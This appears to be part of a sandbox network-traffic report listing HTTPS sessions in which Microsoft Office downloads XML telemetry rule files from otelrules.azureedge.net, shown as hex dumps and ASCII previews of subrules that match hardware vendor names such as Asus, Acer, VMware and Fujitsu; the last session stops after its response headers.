                                                                                2024-10-04 09:33:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                15192.168.2.54972813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                ETag: "0x8DC582B9018290B"
                                                                                x-ms-request-id: e0871f45-901e-00a0-0d8c-156a6d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55472x4k7dmphmadg0000000bx0000000009fh0
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                16192.168.2.54972613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:52 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 486
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB344914B"
                                                                                x-ms-request-id: 1cc301c6-e01e-0071-6b8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55whfstvfw43u8fp40000000ck0000000000wr7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                17192.168.2.54972713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                ETag: "0x8DC582BA310DA18"
                                                                                x-ms-request-id: 1cc301ca-e01e-0071-6f8c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55v7j95gq2uzq37a00000000ck00000000057wq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                18192.168.2.54972913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                ETag: "0x8DC582B9698189B"
                                                                                x-ms-request-id: 023e3944-a01e-003d-708c-1598d7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55rv8zjq9dg0musxg0000000c90000000008e03
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                19192.168.2.55539713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 469
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA701121"
                                                                                x-ms-request-id: a68dfe67-f01e-0052-588c-159224000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55xsgnlxyxy40f4m00000000c5g00000000905t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                20192.168.2.55540013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 494
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB7010D66"
                                                                                x-ms-request-id: 79ade187-001e-0065-788c-150b73000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55472x4k7dmphmadg0000000c0g000000005tvd
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                21192.168.2.55539813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA41997E3"
                                                                                x-ms-request-id: c54fb296-901e-008f-528c-1567a6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc5546rn6ch9zv310e000000005a0000000005hzz
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                22192.168.2.55540113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                ETag: "0x8DC582BB8CEAC16"
                                                                                x-ms-request-id: 24b39fc0-301e-0096-298c-15e71d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55gs96cphvgp5f5vc0000000c4g000000009wt2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                23192.168.2.55539913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:53 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:53 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:53 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 464
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                ETag: "0x8DC582B97FB6C3C"
                                                                                x-ms-request-id: dc68ccfc-201e-006e-438c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093353Z-15767c5fc55sdcjq8ksxt4n9mc00000001hg00000000askx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:53 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                24192.168.2.55540213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:54 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                ETag: "0x8DC582B9748630E"
                                                                                x-ms-request-id: 0da94923-701e-0097-168c-15b8c1000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc55n4msds84xh4z67w000000064g000000000c45
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                25192.168.2.55540313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:54 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:54 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:54 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                x-ms-request-id: 8e9c869d-201e-000c-4b8c-1579c4000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093354Z-15767c5fc554w2fgapsyvy8ua00000000btg000000007b8w
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
